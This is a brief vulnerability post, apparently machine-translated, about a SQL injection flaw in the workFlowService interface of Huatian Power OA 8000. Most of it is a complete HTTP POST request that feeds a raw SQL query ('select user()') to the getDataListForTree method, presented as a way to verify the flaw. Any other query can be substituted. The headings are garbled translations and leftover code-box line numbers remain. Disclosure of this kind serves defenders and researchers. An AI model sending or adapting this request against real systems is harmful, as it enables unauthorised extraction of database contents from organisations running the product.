Huatian Power Oa 8000 Version Workflowservice Sql Injection Vulnerability
Huatian Power Oa 8000 Version Workflowservice Sql Injection Vulnerability
Huatian Power OA 8000 version workFlowService SQL injection vulnerability
Vulnerability Description
Huatian Power OA 8000 version workFlowService interface has SQL injection vulnerability, and attackers can obtain sensitive database information through the vulnerability.
Vulnerability Impact
Huatian Power OA 8000 Edition
Network surveying and mapping
Vulnerability reappears
Product Page
Send request packet verification vulnerability
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host: 、
Accept-Encoding: identity
Content-Length: 103
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0
<buffalo-call>
<method>getDataListForTree</method>
<string>select user()</string>
</buffalo-call>
This post is licensed under CC BY 4.0 by the author.